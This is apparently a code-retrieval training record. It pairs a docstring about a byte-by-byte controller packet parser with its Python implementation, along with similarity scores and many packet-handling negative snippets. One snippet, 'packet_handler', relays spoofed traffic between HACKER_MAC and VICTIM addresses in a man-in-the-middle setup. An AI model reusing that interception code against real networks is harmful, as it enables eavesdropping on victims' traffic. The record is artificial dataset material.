self.prev_artist_button.setEnabled(True)\n self.next_artist_button.setEnabled(True)\n if test == 0:\n self.prev_artist_button.setEnabled(False)\n if test == len(self.c_artists) - 1:\n self.next_artist_button.setEnabled(False)\n self.focus_albums()", "def _clicked_yes_button(self):\n self.yes = True", "def OnButton(self, event):\n button = event.GetEventObject().GetName()\n if button == \"Button1\":\n self.OnButton1()\n elif button == \"Button2\":\n self.OnButton2()\n elif button == \"Button3\":\n self.OnExit(event)", "def setupButtons(self):\n self.addLayerButton.setAccessibleName('editLayer')\n self.addLayerButton.setText('+')\n 
self.deleteLayerButton.setAccessibleName('editLayer')\n self.deleteLayerButton.setText('-')\n self.downButton.setArrowType(QtCore.Qt.DownArrow)\n self.upButton.setArrowType(QtCore.Qt.UpArrow)\n self.addLayerButton.setToolTip('Add a new Layer to the Job.')\n self.deleteLayerButton.setToolTip('Delete the selected Layer from the Job.')\n self.downButton.setToolTip('Move the selected Layer down in the Job.')\n self.upButton.setToolTip('Move the selected Layer up in the Job.')", "def set_navigation(self):\n self.close_button.controlUp(self.wetek_button)\n self.wetek_button.controlDown(self.close_button)\n self.wetek_button.controlRight(self.k_button)\n self.k_button.controlRight(self.khadas_button)\n self.k_button.controlDown(self.close_button)\n self.khadas_button.controlRight(self.generic_button)\n self.khadas_button.controlDown(self.close_button)\n self.generic_button.controlLeft(self.khadas_button)\n self.generic_button.controlDown(self.close_button)\n self.k_button.controlLeft(self.wetek_button)\n self.khadas_button.controlLeft(self.k_button)\n\t # Set initial focus.\n self.setFocus(self.close_button)" ]
[ "0.68849444", "0.68576396", "0.6849067", "0.65670127", "0.65635157", "0.65260524", "0.6473985", "0.6426153", "0.640084", "0.64003897", "0.63505423", "0.6331861", "0.6318083", "0.62580913", "0.6250697", "0.62376004", "0.6207637", "0.6195303", "0.61879086", "0.61741465", "0.61739594", "0.61710924", "0.6169308", "0.6162893", "0.61531526", "0.6153051", "0.61524606", "0.6138895", "0.60758525", "0.6066102", "0.6059723", "0.6029175", "0.6023824", "0.60230297", "0.6022224", "0.6006147", "0.6006147", "0.59911346", "0.5990742", "0.597804", "0.59725004", "0.59612113", "0.5959111", "0.5957306", "0.59540576", "0.5943332", "0.59245723", "0.5922853", "0.59181005", "0.5912712", "0.5909775", "0.5907343", "0.5904873", "0.5903148", "0.5896391", "0.58958817", "0.58958554", "0.5890727", "0.5886544", "0.58816606", "0.5881556", "0.587772", "0.5876329", "0.5863843", "0.5860866", "0.585946", "0.58572286", "0.58473706", "0.58410525", "0.58358294", "0.583331", "0.5830904", "0.58279824", "0.58268595", "0.5826752", "0.5823246", "0.5813552", "0.58108467", "0.5805831", "0.58009744", "0.58005494", "0.5790054", "0.5774448", "0.57678545", "0.57513124", "0.5749569", "0.57484597", "0.57481164", "0.57468355", "0.5744017", "0.5743129", "0.57430464", "0.5740569", "0.5739816", "0.57394975", "0.5735447", "0.5734281", "0.57291853", "0.57271695", "0.5717005", "0.57163674" ]
0.0
-1
Runs a single byte through the packet parsing state machine. Returns NOT_DONE if the packet is incomplete. Returns SUCCESS if the packet was received successfully. Returns CHECKSUM if a checksum error is detected.
def process_byte(self, byte):
    if self.index == -1:
        if byte == 0xff:
            self.index = 0
            self.checksum = 0
    elif self.index == 0:
        if byte != 0xff:
            self.checksum += byte
            self.pkt_bytes[0] = byte
            self.index += 1
    else:
        self.checksum += byte
        self.pkt_bytes[self.index] = byte
        self.index += 1
        if self.index == 7:  # packet complete
            self.index = -1
            if self.checksum & 0xff != 0xff:
                return CommanderRx.CHECKSUM
            self.lookv = self.pkt_bytes[0] - 128  # 0 - 255 ==> -128 - 127
            self.lookh = self.pkt_bytes[1] - 128
            self.walkv = self.pkt_bytes[2] - 128
            self.walkh = self.pkt_bytes[3] - 128
            self.button = self.pkt_bytes[4]
            self.ext = self.pkt_bytes[5]
            return CommanderRx.SUCCESS
    return CommanderRx.NOT_DONE
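A minimal usage sketch (added for illustration, not part of the dataset row): it assumes a CommanderRx class whose __init__ sets index = -1, checksum = 0 and pkt_bytes = [0] * 7, and which defines the NOT_DONE, SUCCESS and CHECKSUM constants alongside the process_byte() method shown above; the synthetic frame bytes are made up so that the checksum works out.

# Hypothetical driver loop for the byte-at-a-time parser above.
rx = CommanderRx()

# One synthetic 8-byte frame: 0xff header, six data bytes, then a checksum byte
# chosen so that the sum of the seven buffered bytes & 0xff equals 0xff.
frame = bytes([0xff, 128, 128, 128, 128, 0, 0, 255])

for b in frame:
    status = rx.process_byte(b)
    if status == CommanderRx.SUCCESS:
        # axes come back re-centred around 0; button and ext are the raw bytes
        print(rx.lookv, rx.lookh, rx.walkv, rx.walkh, rx.button, rx.ext)
    elif status == CommanderRx.CHECKSUM:
        print('checksum mismatch - frame dropped')
    # NOT_DONE means the frame is still incomplete; keep feeding bytes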
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def readCommand(self):\n while (True):\n time.sleep(1)\n # At least a package of 4 bytes (minimum)\n # [ Head | Length | Address | Data[0…N] | Check ]\n if (self._serial.inWaiting()>=4):\n # Gets only the first byte of the packet (it should be HEAD)\n packet_header = self._serial.read(1)\n if (packet_header != Ind903Packet.PACKET_HEAD):\n # the next one is the length of the packet\n packet_length_bytes = self._serial.read(1)\n packet_length = int.from_bytes(packet_length_bytes, byteorder='big')\n if (packet_length > 0):\n raw_packet = b\"\".join([packet_header, packet_length_bytes, self._serial.read(packet_length)]) \n result_packet = Ind903Packet.parsePacket(raw_packet)\n return (result_packet)", "def _receive_packet(self):\n report = self._serial_read(1)\n if len(report) != 1:\n self.log(\"ERROR: Didn't read back a report!\")\n report = -1\n else:\n report = report[0]\n retval = self._serial_read(1)\n if len(retval) != 1:\n self.log(\"ERROR: Didn't read back a return value!\")\n retval = -1\n else:\n retval = retval[0]\n\n return_payload_len = self._serial_read(1)\n if len(return_payload_len) != 1:\n self.log(\"ERROR: Didn't read back a return payload length!\")\n return_payload_len = 0\n else:\n return_payload_len = return_payload_len[0]\n\n if return_payload_len != 0:\n return_payload = self._serial_read(return_payload_len)\n else:\n return_payload = []\n checksum = self._serial_read(1)\n if len(checksum) != 1:\n self.log(\"ERROR: Didn't read back a checksum!\")\n checksum = -1\n else:\n checksum = checksum[0]\n\n data = self.MAGIC_HEADER + [report, retval, return_payload_len] + return_payload\n data.append(checksum)\n\n our_checksum = self.generate_checksum(data[:-1])\n if our_checksum != checksum:\n self.log(\"ERROR: Our checksum didn't calculate properly! \"\n \"(Calculated {}, expected {})\".format(our_checksum, checksum))\n return -1, checksum, []\n else:\n if self.verbose:\n self.log(\"Checksum match! 
({} == {})\".format(our_checksum, checksum))\n\n return report, retval, return_payload", "def process_message(msg):\r\n print(\"received \")\r\n global bytes_in\r\n if len(msg) == 200: # is header or end\r\n print(\"found header\")\r\n msg_in = msg.decode(\"utf-8\")\r\n msg_in = msg_in.split(\",,\")\r\n print(msg_in)\r\n if msg_in[0] == \"end\": # is it really last packet?\r\n in_hash_final = in_hash_md5.hexdigest()\r\n if in_hash_final == msg_in[2]:\r\n print(\"File copied OK -valid hash \", in_hash_final)\r\n return -1\r\n else:\r\n print(\"Bad file receive \", in_hash_final)\r\n return False\r\n else:\r\n if msg_in[0] != \"header\":\r\n in_hash_md5.update(msg)\r\n return True\r\n else:\r\n return False\r\n else:\r\n bytes_in = bytes_in + len(msg)\r\n in_hash_md5.update(msg)\r\n print(\"found data bytes= \", bytes_in)\r\n return True", "def _recv(self):\n result = self._con.receive()\n if result.startswith(Parser.NOT_OK_MSG) or len(result) == 0:\n return result\n while not result.endswith(Parser.OK_MSG + '\\n') and not result.startswith(Parser.OK_MSG):\n result += self._con.receive()\n return result", "def packet_read(self):\n bytes_received = 0\n \n if self.sock == NC.INVALID_SOCKET:\n return NC.ERR_NO_CONN\n \n if self.in_packet.command == 0:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, 1)\n if errnum == 0 and len(ba_data) == 1:\n bytes_received += 1\n byte = ba_data[0]\n self.in_packet.command = byte\n \n if self.as_broker:\n if self.bridge is None and self.state == NC.CS_NEW and (byte & 0xF0) != NC.CMD_CONNECT:\n print \"RETURN ERR_PROTOCOL\"\n return NC.ERR_PROTOCOL, bytes_received\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n \n if not self.in_packet.have_remaining:\n loop_flag = True\n while loop_flag:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, 1)\n \n if errnum == 0 and len(ba_data) == 1: \n byte = ba_data[0]\n bytes_received += 1\n self.in_packet.remaining_count += 1\n if self.in_packet.remaining_count > 4:\n return NC.ERR_PROTOCOL, bytes_received\n \n self.in_packet.remaining_length += (byte & 127) * self.in_packet.remaining_mult\n self.in_packet.remaining_mult *= 128\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n \n if (byte & 128) == 0:\n loop_flag = False\n \n if self.in_packet.remaining_length > 0:\n self.in_packet.payload = bytearray(self.in_packet.remaining_length)\n if self.in_packet.payload is None:\n return NC.ERR_NO_MEM, bytes_received\n self.in_packet.to_process = self.in_packet.remaining_length\n \n self.in_packet.have_remaining = True\n \n if self.in_packet.to_process > 0:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, self.in_packet.to_process)\n if errnum == 0 and len(ba_data) > 0:\n readlen = len(ba_data)\n bytes_received += readlen\n for idx in xrange(0, readlen):\n self.in_packet.payload[self.in_packet.pos] = ba_data[idx]\n self.in_packet.pos += 1\n self.in_packet.to_process -= 1\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return 
NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n\n #all data for this packet is read\n self.in_packet.pos = 0\n \n ret = self.packet_handle()\n \n self.in_packet.packet_cleanup()\n \n self.last_msg_in = time.time()\n \n return ret, bytes_received", "def do(self, command):\r\n command += xsct_line_end\r\n logger.info('Sending command: %s ...', repr(command))\r\n self.send(command)\r\n ans = self.recv()\r\n if ans.startswith('okay'):\r\n return ans[5:]\r\n if ans.startswith('error'):\r\n raise PyXilException(ans[6:])\r\n raise PyXilException('Illegal start-string in protocol. Answer is: ' + ans)", "def got_packet(self, pkt):\n self._log.debug(\"got a packet {}\".format(pkt))\n if pkt.is_syn():\n # this is a syn packet\n # set the sequence number to 0\n self.seqno = 0\n elif pkt.is_ack():\n # this is a plain ack\n # the sender got our data\n # just increment the sequence number\n self.seqno += 1\n return\n if pkt.empty():\n # this packet is emtpy?\n self._log.info(\"empty packet {}\".format(pkt))\n return\n # have the user recv the payload\n self._recv(pkt.payload)", "def check_ack_or_nak(message):\n value = message.body[-1]\n\n if value == 0x06:\n return\n elif value == 0x15:\n raise CommandFailure(command_code=message.command_code)\n else:\n raise RuntimeError(\"Unexpected ACK/NAK value (0x%02x)\" % value)", "def recvData(self) -> bytes:\n \n packet = self.recvPacket()\n if(packet.seq == Rudp.ackPlusOne(self.ack)):\n self.ack = Rudp.ackPlusOne(self.ack)\n self.acknowledgePacket(packet)\n return packet.payload\n else:\n return None", "def _do_some_logic(self, packet):\n\n\n pass", "def parse(self):\n try:\n if self.bitstream:\n # Parse message header\n self.bitstream.bytepos = 0\n\n if self.bitstream.endswith(\"\\n\"):\n pass\n\n else:\n raise PacketIncomplete(\"Packet does not end with carriage return\")\n\n if self.bitstream.find('0x 50 52 56 41 54',bytealigned=True): # If 'PRVAT' text in bitstream\n self.dataformat = 'NMEA'\n else:\n self.dataformat = 'TRITECH'\n\n if self.dataformat=='NMEA' and self.id != Message.CONFIGURATION_PARAM:\n # go to first comma\n self.bitstream.bytepos = self.bitstream.find('0x2C', bytealigned = True)[0]/8 + 1\n self.payload = self.bitstream.read('bytes:6')\n #skip comma\n self.bitstream.read('bytes:1')\n self.dataunits = self.bitstream.read('bytes:1')\n\n\n elif self.dataformat=='TRITECH' and self.id != Message.CONFIGURATION_PARAM:\n self.bitstream.bytepos = 0\n self.payload = self.bitstream.read('bytes:6')\n self.dataunits = self.bitstream.read('bytes:1')\n else:\n self.bitstream.bytepos = 0\n length_string = 'bytes:'+ str(len(self.bitstream)/8)\n self.payload = self.bitstream.read(length_string)\n\n else:\n pass\n\n except ValueError as e:\n raise PacketCorrupted(\"Unexpected error\", e)", "def parse_packet(packet, traffic_type, pkt_type, exp_dst, step):\n packet_count = 0\n if(traffic_type == \"encap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] 
== STP_DEST_MAC) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect encapsulation'\n print(\"Correct encapsulation\")\n\n elif(traffic_type == \"decap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect decapsulation'\n print(\"Correct decapsulation\")", "def process(self, packet):\n pass", "def read_versa5(self,addr,fullrepsonse=False):\n time.sleep(0.002)\n addr = addr & 0xff\n cmd = bytes([0x07,0xea,addr,0x00])\n res = self.command(0x3c,cmd)\n if fullresponse:\n return res\n else:\n return res.response_data & 0x0ff", "def _compute_checksum(packet):\n # checksum is the sum of the bytes\n # from device id to the end of the data\n # mod (%) 256 and bit negated (~) (1's compliment)\n # and (&) with 0xFF to make sure it is a byte.\n return ~(sum(packet[2:]) % 0x100) & 0xFF", "def process(self, data):\n\n\t\t# Check if the 802.15.4 packet is valid\n\t\tif makeFCS(data[:-2]) != data[-2:]:\n\t\t\tprint(hue.bad(\"Received invalid packet\"))\n\t\t\treturn\n\n\t\tpacket = Dot15d4FCS(data)\n\n\t\tif packet.fcf_frametype == 2: # ACK\n\t\t\tself.last_ack = packet.seqnum", "def checkChecksum(self):\n if not self.checkPacketLength():\n return False\n return CCSDS.DU.DataUnit.checkChecksum(self)", "def receive(self, packet):\n if packet.dest in self.address_to_port:\n # The packet is destined to one of the clients connected to this middlebox;\n # send the packet there.\n # if packet.is_fin:\n # print(\"2nd wan sees a fin\")\n\n if packet.is_fin and len(packet.payload) == 0:\n # print(\"empty fin, foward fin\")\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n block_hash = get_hash(pack_buff)\n if block_hash not in self.hash_to_raw_data.keys():\n self.hash_to_raw_data[block_hash] = pack_buff\n self.send_data_in_packets(packet.src, packet.dest, True, False, pack_buff, is_wan_port = False)\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\" # reset buffer\n self.send(packet, self.address_to_port[packet.dest]) # forward empty fin\n return\n \n if (packet.src, packet.dest) not in self.srcdest_to_buffer.keys():\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n \n if packet.is_raw_data:\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n pack_buff += packet.payload\n\n block_list, remaining_buff = self.break_data_into_blocks(pack_buff)\n for block_to_send in block_list:\n block_hash = get_hash(block_to_send)\n # print(\"sending1\")\n if block_hash in self.hash_to_raw_data.keys():\n # send extract data from hash in packet\n block_to_send = self.hash_to_raw_data[block_hash]\n self.send_data_in_packets(packet.src, packet.dest, True, False, 
block_to_send, is_wan_port = False)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n\n if remaining_buff:\n # print(\"wan to client remaining_buff: \" + remaining_buff)\n if packet.is_fin:\n block_hash = get_hash(remaining_buff)\n block_to_send = remaining_buff\n # print(\"sending2\")\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n # print(\"sending fin1\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n pack_buff = \"\"\n else:\n pack_buff = remaining_buff\n else:\n pack_buff = \"\"\n if packet.is_fin:\n # print(\"sending fin2\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n self.srcdest_to_buffer[(packet.src, packet.dest)] = pack_buff\n else:\n block_hash = packet.payload\n block_to_send = self.hash_to_raw_data[block_hash]\n # print(\"sending3\")\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n if packet.is_fin:\n # print(\"sending fin3\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n # self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\" # TESTING\n else:\n # The packet must be destined to a host connected to the other middlebox\n # so send it across the WAN.\n if packet.is_fin and len(packet.payload) == 0:\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n block_hash = get_hash(pack_buff)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = pack_buff\n self.send_data_in_packets(packet.src, packet.dest, True, False, pack_buff, is_wan_port = True)\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n self.send(packet, self.wan_port)\n return\n\n if (packet.src, packet.dest) not in self.srcdest_to_buffer.keys():\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n\n pack_buff += packet.payload\n block_list, remaining_buff = self.break_data_into_blocks(pack_buff)\n\n # send off all completed blocks\n for block_to_send in block_list:\n block_hash = get_hash(block_to_send)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = True)\n\n if remaining_buff:\n # print(\"wan to wan remaining_buff: \" + remaining_buff)\n if packet.is_fin:\n # print(\"finfin\")\n block_to_send = remaining_buff\n block_hash = get_hash(block_to_send)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n 
self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = True)\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.wan_port)\n pack_buff = \"\"\n else:\n pack_buff = remaining_buff\n else:\n pack_buff = \"\"\n self.srcdest_to_buffer[(packet.src, packet.dest)] = pack_buff", "def EndOfPacket(self) -> bool:", "def handle_packet(self, pkt):\n logger.info('got a message:{}'.format(pkt))\n self._sock_rep_to_server.send_pyobj(packet.Ack())\n \n state = True\n extradata = {}\n \n if hasattr(self, 'handle_action'):\n _tmp = self.handle_action(pkt)\n try:\n state, data = _tmp\n extradata['extra'] = data\n except ValueError:\n extradata['extra'] = _tmp\n if extradata:\n state = False\n \n return state, extradata", "def process_message(msg):\n global fout\n print(\"received \")\n if len(msg)==200: #is header or end\n msg_in=msg.decode(\"utf-8\",\"ignore\")\n msg_in=msg_in.split(\",,\")\n if msg_in[0]==\"header\": #header\n filename=extract_file_data(msg_in[1])\n file_out=\"copy-\"+filename\n fout=open(file_out,\"wb\") #use a different filename\n\n if msg_in[0]==\"end\": #is it really last packet?\n in_hash_final=in_hash_md5.hexdigest()\n if in_hash_final==msg_in[2]:\n print(\"File copied OK -valid hash \",in_hash_final)\n else:\n print(\"Bad file receive \",in_hash_final)\n return False\n else:\n if msg_in[0]!=\"header\":\n in_hash_md5.update(msg)\n return True\n else:\n return False\n else:\n in_hash_md5.update(msg)\n #msg_in=msg.decode(\"utf-8\",\"ignore\")\n if len(msg) <100:\n print(msg)\n return True", "def parse_message(buffer):\n _discard_until_message_start(buffer)\n\n if buffer and buffer[0] == MESSAGE_FAILURE_BYTE:\n buffer[:] = buffer[1:]\n return MessageFailure(\n 'Command send failure (probable collision). Expect a retry.',\n ), 2 - len(buffer)\n\n # It takes at least 2 bytes to move forward.\n if len(buffer) < 2:\n return None, 2 - len(buffer)\n\n try:\n command_code = CommandCode(buffer[1])\n except ValueError:\n logger.warning(\n \"Unrecognized command code (0x%02x). Ignoring invalid data.\",\n buffer[1],\n )\n buffer[:2] = []\n\n return None, 2\n\n extension = 0\n\n # If the message is an Insteon message and has the extended flag, we expect\n # 14 user-data more bytes.\n if command_code == CommandCode.send_standard_or_extended_message:\n if len(buffer) >= 6 and buffer[5] & (1 << 4):\n extension = 14\n\n body, expected = _extract_body(\n buffer,\n BODY_SIZES[command_code] + extension,\n )\n\n # Not enough bytes to process the message. 
Let's wait for more.\n if body is None:\n return None, expected\n\n return (\n IncomingMessage(command_code=command_code, body=body),\n max(2 - len(buffer), 1),\n )", "def handle_flow(self, expected: [Flag]) -> Optional[dict]:\n try:\n segment = self.buffer.get(block=False)\n message = self.unpack_segment(segment)\n if message['flag'] in expected and self.valid_checksum(message):\n self.others_recv_win = message['win']\n return message\n except queue.Empty:\n pass\n return None", "def unpack(self, pkt):\n if pkt[0]!='$' or pkt[-3]!='#':\n raise ValueError('bad packet')\n if (sum(ord(c) for c in pkt[1:-3]) % 256) != int(pkt[-2:],16):\n raise ValueError('bad checksum')\n pkt = pkt[1:-3]\n return pkt", "def _parse_udp_packet(self, packet_bytes):\n opcode = packet_bytes[:2]\n if opcode == 5:\n reply = self.error_messages[int.from_bytes(packet_bytes[2:4], 'big')]\n print(reply)\n elif opcode == 4:\n reply = \"ACK\"\n else:\n reply = \"UNK\"\n return reply", "def acknowledge(self, validity = True) -> int:\n (data, s) = self.socket.recvfrom(Rudp.Packet.buffer())\n (packet, validity) = Rudp.Packet.unpack(data)\n if(validity and s == self.server):\n return packet.ack\n else:\n return None", "def ping(self):\n\t\t## NOTE: the Microblaze can only accept byte values between -128 and 127 (so 0xCF is too large)\n\t\trb = [0x00]\n\n\t\t# self.spi.transfer([0xCF], rb, 1)\n\t\t# mapped_cmd_byte = [_map_value(0xCF, 0, 255, -128, 127)]\n\t\tmapped_cmd_byte = [0xCF-128]\n\t\tself.spi.transfer(mapped_cmd_byte, rb, 1)\n\n\t\ttime.sleep(0.1)\n\t\tif rb[0] < 0: \t\t\t\t\t\t## Account for implicit unsigned-to-signed \n\t\t\trb[0] += 256\t\t\t\t\t## conversion from the transfer operation\n\t\treturn rb[0] == 0xF3", "def receive(self, packet):\n if packet.dest in self.address_to_port:\n # The packet is destined to one of the clients connected to this middlebox;\n # send the packet there.\n if packet.is_raw_data:\n if not (packet.src, packet.dest) in self.buffer:\n self.buffer[packet.src, packet.dest] = \"\"\n start = len(self.buffer[(packet.src, packet.dest)])\n self.buffer[(packet.src, packet.dest)] = self.buffer[(packet.src, packet.dest)] + packet.payload\n i = max(start, 47)\n while i < len(self.buffer[(packet.src, packet.dest)]):\n i += 1\n h = utils.get_hash(self.buffer[(packet.src, packet.dest)][i-48:i])\n if utils.get_last_n_bits(h, 13) == self.GLOBAL_MATCH_BITSTRING:\n block = self.buffer[(packet.src, packet.dest)][:i]\n self.cache[utils.get_hash(block)] = block\n self.buffer[(packet.src, packet.dest)] = self.buffer[(packet.src, packet.dest)][i:]\n i = 47\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, True, False, block), self.address_to_port[packet.dest])\n\n # remainder = self.buffer[(packet.src, packet.dest)][self.BLOCK_SIZE:]\n \n if packet.is_fin:\n block = self.buffer[(packet.src, packet.dest)]\n self.cache[utils.get_hash(block)] = block\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, True, True, block), self.address_to_port[packet.dest])\n self.buffer[(packet.src, packet.dest)] = \"\"\n else:\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, True, packet.is_fin, self.cache[packet.payload]), self.address_to_port[packet.dest])\n else:\n # The packet must be destined to a host connected to the other middlebox\n # so send it across the WAN.\n if packet.is_raw_data:\n if not (packet.src, packet.dest) in self.buffer:\n self.buffer[packet.src, packet.dest] = \"\"\n start = len(self.buffer[(packet.src, packet.dest)])\n self.buffer[(packet.src, packet.dest)] = 
self.buffer[(packet.src, packet.dest)] + packet.payload\n i = max(start, 47)\n while i < len(self.buffer[(packet.src, packet.dest)]):\n i += 1\n h = utils.get_hash(self.buffer[(packet.src, packet.dest)][i-48:i])\n if utils.get_last_n_bits(h, 13) == self.GLOBAL_MATCH_BITSTRING:\n block = self.buffer[(packet.src, packet.dest)][:i]\n if utils.get_hash(block) in self.cache:\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, False, False, utils.get_hash(block)), self.wan_port)\n else:\n self.cache[utils.get_hash(block)] = block\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, True, False, block), self.wan_port)\n self.buffer[(packet.src, packet.dest)] = self.buffer[(packet.src, packet.dest)][i:]\n i = 47\n\n if packet.is_fin:\n block = self.buffer[(packet.src, packet.dest)]\n if utils.get_hash(block) in self.cache:\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, False, True, utils.get_hash(block)), self.wan_port)\n else:\n self.cache[utils.get_hash(block)] = block\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, True, True, block), self.wan_port)\n self.buffer[(packet.src, packet.dest)] = \"\"\n else:\n # 1/0\n self.send_block(packet, self.wan_port)", "def _receive_check(self, length):\n data = self._receive(length)\n return data[:-1]", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def valid_response(line):\n cksum = int(line[-2:], 16) # checksum is last two characters in ASCII hex\n data = line[:-2] # remove checksum from data\n\n calc_cksum = checksum(data)\n if cksum != calc_cksum:\n log.debug('checksum failed (%r): should be %s', line, hex(calc_cksum))\n return False\n return True", "def pes_packet_check_formedness(payload):\n b1 = ord(payload[0])\n b2 = ord(payload[1])\n b3 = ord(payload[2])\n\n b4 = ord(payload[3])\n if b1 != 0 or b2 != 0 or b3 != 1:\n return False\n return True", "def process(self, raw: bytes) -> Tuple[bool, bytes]:\n line, raw = find_http_line(raw)\n if line is None:\n return False, raw\n\n if self.state == httpParserStates.INITIALIZED:\n self.process_line(line)\n self.state = httpParserStates.LINE_RCVD\n elif self.state in (httpParserStates.LINE_RCVD, httpParserStates.RCVING_HEADERS):\n if self.state == httpParserStates.LINE_RCVD:\n # LINE_RCVD state is equivalent to RCVING_HEADERS\n self.state = httpParserStates.RCVING_HEADERS\n if line.strip() == b'': # Blank line received.\n self.state = httpParserStates.HEADERS_COMPLETE\n else:\n self.process_header(line)\n\n # When connect request is received without a following host header\n # See\n # `TestHttpParser.test_connect_request_without_host_header_request_parse`\n # for details\n if self.state == httpParserStates.LINE_RCVD and \\\n self.type == httpParserTypes.RESPONSE_PARSER and \\\n raw == CRLF:\n self.state = httpParserStates.COMPLETE\n # When raw request has ended with \\r\\n\\r\\n and no more http headers are expected\n # See `TestHttpParser.test_request_parse_without_content_length` and\n # `TestHttpParser.test_response_parse_without_content_length` for details\n elif self.state == httpParserStates.HEADERS_COMPLETE and \\\n self.type == httpParserTypes.REQUEST_PARSER and \\\n self.method != httpMethods.POST and \\\n self.bytes.endswith(CRLF * 2):\n self.state = httpParserStates.COMPLETE\n elif self.state == httpParserStates.HEADERS_COMPLETE and 